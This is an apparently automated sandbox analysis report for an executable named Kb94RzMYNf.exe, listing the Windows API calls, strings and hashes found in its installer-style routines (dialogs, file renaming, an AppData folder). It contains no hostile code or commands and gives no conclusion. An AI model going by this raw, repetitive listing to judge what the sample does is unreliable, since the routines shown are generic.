                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                              • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                                              • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                                                                                                              • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                                              • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                                                                                                              APIs
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403F0E), ref: 00404140
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                              • Opcode ID: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                                                                                              • Instruction ID: 67e4992f565e21c11dbb8c54ac12ec2a13ba7de1e04ee321f93102ddb6e8c06b
                                                                                                                                                              • Opcode Fuzzy Hash: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                                                                                              • Instruction Fuzzy Hash: B2A00176944501EBCE129B90EF49D0ABB62EBE4701B5185B9A685900348A728862EB69
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B43
                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404B4E
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404BAB
                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404C21
                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404D7B
                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404F4B
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404F5B
                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004050AC
                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004050FA
                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405105
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040510C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                              • String ID: $M$N
                                                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                                                              • Opcode ID: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                                                                                              • Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
                                                                                                                                                              • Opcode Fuzzy Hash: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                                                                                              • Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 004045FE
                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404628
                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 004046D9
                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004046E4
                                                                                                                                                              • lstrcmpiW.KERNEL32(: Completed,0042D248,00000000,?,?), ref: 00404716
                                                                                                                                                              • lstrcatW.KERNEL32(?,: Completed), ref: 00404722
                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734
                                                                                                                                                                • Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C
                                                                                                                                                                • Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                                                                                                • Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                                                                                                • Part of subcall function 004062E4: CharNextW.USER32(?,00000000,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                                                                                                • Part of subcall function 004062E4: CharPrevW.USER32(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 004047F7
                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812
                                                                                                                                                                • Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                                                                                                • Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
                                                                                                                                                                • Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                              • String ID: : Completed$A$C:\Users\user\AppData\Local\neoimpressionism
                                                                                                                                                              • API String ID: 2624150263-1758597695
                                                                                                                                                              • Opcode ID: 384026e9e9e5746c7f9dfe92ab28aced1d92048ea58c9d733445c263ea4897ef
                                                                                                                                                              • Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
                                                                                                                                                              • Opcode Fuzzy Hash: 384026e9e9e5746c7f9dfe92ab28aced1d92048ea58c9d733445c263ea4897ef
                                                                                                                                                              • Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D
                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\neoimpressionism, xrefs: 00402154
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\neoimpressionism
                                                                                                                                                              • API String ID: 542301482-3269196450
                                                                                                                                                              • Opcode ID: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                                                                                              • Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
                                                                                                                                                              • Opcode Fuzzy Hash: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                                                                                              • Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: p!C$p!C
                                                                                                                                                              • API String ID: 0-3125587631
                                                                                                                                                              • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                              • Instruction ID: 15f69c865bc8d9ec0e9cf8060aa07673d574756af28658d99b75493111c5da86
                                                                                                                                                              • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                              • Instruction Fuzzy Hash: 1DC15831E042598BCF18CF68D4905EEB7B2FF99314F25826AD8567B380D7346A42CF95
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                              • Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
                                                                                                                                                              • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                              • Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14
                                                                                                                                                              APIs
                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                              • DrawTextW.USER32(00000000,Janushoveds Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                              • String ID: F$Janushoveds Setup
                                                                                                                                                              • API String ID: 941294808-3463238137
                                                                                                                                                              • Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                                                                                              • Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
                                                                                                                                                              • Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                                                                                              • Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4
                                                                                                                                                              APIs
                                                                                                                                                              • lstrcpyW.KERNEL32(004308E8,NUL,?,00000000,?,?,00405F12,?,?), ref: 00405D8E
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F12,?,?), ref: 00405DB2
                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB
                                                                                                                                                                • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                                                                                                • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                                                                                              • GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
                                                                                                                                                              • wsprintfA.USER32 ref: 00405DF6
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                                                                                              • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405EDF
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6
                                                                                                                                                                • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C29
                                                                                                                                                                • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C4B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                              • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                                              • API String ID: 222337774-899692902
                                                                                                                                                              • Opcode ID: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                                                                                              • Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
                                                                                                                                                              • Opcode Fuzzy Hash: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                                                                                              • Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC
                                                                                                                                                              APIs
                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040434F
                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404363
                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001), ref: 00404380
                                                                                                                                                              • GetSysColor.USER32(?), ref: 00404391
                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,?,?), ref: 0040439F
                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,?,04010000), ref: 004043AD
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 004043B2
                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,?,00000000), ref: 004043BF
                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,?,?), ref: 004043D4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
